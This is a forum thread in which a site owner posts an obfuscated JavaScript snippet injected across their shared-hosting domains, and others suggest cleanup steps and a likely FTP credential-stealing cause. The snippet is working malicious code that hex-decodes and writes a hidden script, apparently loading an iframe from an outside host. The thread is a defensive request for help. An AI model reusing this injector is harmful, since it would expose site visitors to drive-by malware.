I found the following javascript on multiple domains on my shared hosting account. I've removed any remnants I could find. I just noticed this the other day. I am definitely going to change my passwords, but I was wondering if anyone has seen anything like this before: <script>c46d278='';r935ebef290=document;r935ebef290.write('<scr'+'ipt>function r4569f8(rf5689){return e'+c46d278+'val(rf5689); }</scr'+'ipt>'); function c461134c94r570039(r9fcf87c5e9){ var d5e7='';return (r4569f8('p'+d5e7+'arseInt')(r9fcf87c5e9,16));}function rcb3e7ac446d(r9e84868f){ function ra8e2732(){var rd81c7eb9a71=2;return rd81c7eb9a71;} var r12ae09a5cda='';r6791d='fromCh';r587192=String[r6791d+'arCode'];for(r8a86e310237=0;r8a86e310237<r9e84868f.length;r8a86e310237+=ra8e2732()){ r12ae09a5cda+=(r587192(c461134c94r570039(r9e84868f.substr(r8a86e310237,ra8e2732()))));}return r12ae09a5cda;} var r9f0e9628='3C7363726970743E69662821'+c46d278+'6D796961'+c46d278+'297B646F63756D656E742E777269746528756E65736361'+c46d278+'7065282027253363253639253636253732253631'+c46d278+'253664253635253230253665253631'+c46d278+'253664253635253364253633253334253336253230253733253732253633253364253237253638253734253734253730253361'+c46d278+'25326625326625373425363525373225363925373325373425366625373225363925366525363325326525363325366625366425326625373425373325326625363925366525326525363325363725363925336625363325366625363425363925366526253237253262253464253631'+c46d278+'253734253638253265253732253666253735253665253634253238253464253631'+c46d278+'253734253638253265253732253631'+c46d278+'253665253634253666253664253238253239253261'+c46d278+'253336253330253338253334253239253262253237253333253237253230253737253639253634253734253638253364253331'+c46d278+'253335253336253230253638253635253639253637253638253734253364253333253339253230253733253734253739253663253635253364253237253736253639253733253639253632253639253663253639253734253739253361'+c46d278+'253638253639253634253634253635253665253237253365253363253266253639253636253732253631'+c46d278+'2536642536352533652729293B7D7661'+c46d278+'72206D796961'+c46d278+'3D747275653B3C2F7363726970743E';r935ebef290.write(rcb3e7ac446d(r9f0e9628));</script><script>check_content()</script> Code (markup):
never seen before but had OTHER script on my site before make sure you have NO link exchange that includes any kind of javascript - now or in the past !! make sure you have NO private ads that include any kind of javascript ( except Google )! secure your server ALL the way including cross scripting ( install mod_security and/or snort ) completely clean all files beyond the html files that contained your a.m. script
Shared hosting is a problem because you can't secure properly what you don't own. Changing your passwords may help, or may not, depending how they got in. As far as the js content itself, you can decrypt it at: gosu.pl/decoder/
this code has been known as malicious malware code which we think it may injected from a wordpress buggy version. Just do a complete clean up, upgrade all your wordpress version if there is any, change the admin password and as well as change the hosting control panel login password once you have cleaned all up. Your host can help you to clean them up entirely and then change the password for you.
This type of code and many close variations have been the result of a virus that steals FTP login credentials from infected PCs, sends the credentials to a server which then infects the website(s). This virus works well with PCs that have FileZilla or CuteFTP on them as these programs store their saved login credentials in a plain text file. Many have had to use a different anti-virus program than what they currently had installed as this virus is very adept at evading detection from the currently installed anti-virus program. Good success has been achieved with one of the following: Avast, F-Prot or Kaspersky. Kaspersky doesn't play well with other AV products so you may have to uninstall your current AV if you decide to go that route. First, change all FTP passwords. Then scan all PCs with a different anti-virus program. Then remove the malscript from all files. Then, if you're blacklisted by Google, request a review. Post back here if you have any further questions or updates.
Are you aware of this virus affecting the Linux OS, specifically Ubuntu. I run ubuntu, but I had given passwords out to other developers which use Windows...
No. I've only seen or heard about it on Windows XP. So I would have them scan their PCs. What I like to do is setup separate FTP accounts for each person. Then I can scan the logs when a website is hacked to see who's login was used. Then I know that person has a virus or they gave out my information and should be shot. I'm jus' sayin'...